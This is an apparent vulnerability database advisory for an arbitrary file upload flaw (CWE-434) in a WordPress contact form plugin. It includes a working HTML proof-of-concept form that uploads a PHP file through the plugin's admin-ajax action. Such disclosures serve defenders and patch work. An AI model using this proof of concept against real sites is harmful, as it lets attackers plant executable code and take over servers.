N-Media Website Contact Form with File Upload - Arbitrary File Upload



Proof of Concept
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugin

References

URL https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claude Godlewski
Verified No
WPVDB ID 8623

Timeline

Publicly Published 2016-09-19
Added 2016-09-21
Last Updated 2017-10-30
